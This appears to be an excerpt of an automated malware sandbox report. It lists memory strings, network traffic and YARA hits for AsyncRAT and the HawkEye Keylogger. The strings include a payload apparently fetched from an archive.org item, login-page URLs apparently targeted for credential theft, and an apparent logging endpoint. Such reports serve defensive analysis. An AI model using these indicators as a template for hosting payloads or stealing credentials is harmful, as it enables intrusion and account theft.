Source: vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmp	String found in binary or memory: dataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmp	String found in binary or memory: dataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: tmpFB21.tmp.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: s://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: s://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2

Source: unknown

DNS traffic detected: queries for: ia601504.us.archive.org

Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: wscript.exe, 00000000.00000003.340516433.000001B8665AF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.g
Source: tmp87E4.tmp.exe, 0000000C.00000002.610844081.000000000506F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdig2s1-1597.crl0
Source: wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0=w
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: tmp87E4.tmp.exe, 0000000C.00000002.610746899.0000000005046000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F8008506.12.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: tmpFB21.tmp.exe, 0000000D.00000003.493276632.0000000005AA3000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com;
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/02
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/05
Source: tmp87E4.tmp.exe, 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tmpFB21.tmp.exe	String found in binary or memory: http://whatismyipaddress.com/
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.dr	String found in binary or memory: http://whatismyipaddress.com/-
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com-E
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com;
Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comMP_
Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comafet6
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comal
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comfacb
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comhly#
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: tmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comF
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comTTFd
Source: tmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.coma
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comalic
Source: tmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comcomF
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comd
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comdG
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comdi
Source: tmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comdita
Source: tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comessed8
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comitu
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comsief
Source: tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comtua
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn)
Source: tmpFB21.tmp.exe, 0000000D.00000003.494591560.0000000005AA2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/S
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnlw
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnm
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnu
Source: tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmQK
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/3
Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/8
Source: tmpFB21.tmp.exe, 0000000D.00000003.496076219.0000000005AAC000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/96
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/G
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/L
Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0et
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/arge
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/het
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/i
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/3
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/G
Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/i
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/r
Source: tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/r
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/udi
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/uild
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/vno8
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/wab
Source: tmpFB21.tmp.exe, 0000000D.00000003.500377718.0000000005ADD000.00000004.00000001.sdmp	String found in binary or memory: http://www.monotype.
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.co
Source: tmpFB21.tmp.exe.2.dr	String found in binary or memory: http://www.nirsoft.net/
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp	String found in binary or memory: http://www.site.com/logs.php
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.de
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: vbc.exe, 0000000F.00000003.517667198.000000000210C000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activi
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: https://certs.godaddy.com/repository/0
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp	String found in binary or memory: https://ia601504.us.archive.org/
Source: wscript.exe, 00000000.00000003.340835595.000001B863D52000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.369127141.000001B865B94000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.361151297.000001B863DE7000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373459438.000001B865C70000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.368780987.000001B865B73000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373627611.000001B865F9B000.00000004.00000001.sdmp	String found in binary or memory: https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt
Source: wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt3u
Source: wscript.exe, 00000000.00000003.339656954.000001B863D52000.00000004.00000001.sdmp	String found in binary or memory: https://ia601504.us.archive.org/25/iter
Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp	String found in binary or memory: https://ia601504.us.archive.org/3
Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com
Source: tmpFB21.tmp.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: tmpFB21.tmp.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https:/

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699

Source: unknown

HTTPS traffic detected: 207.241.227.114:443 -> 192.168.2.6:49699 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match	File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
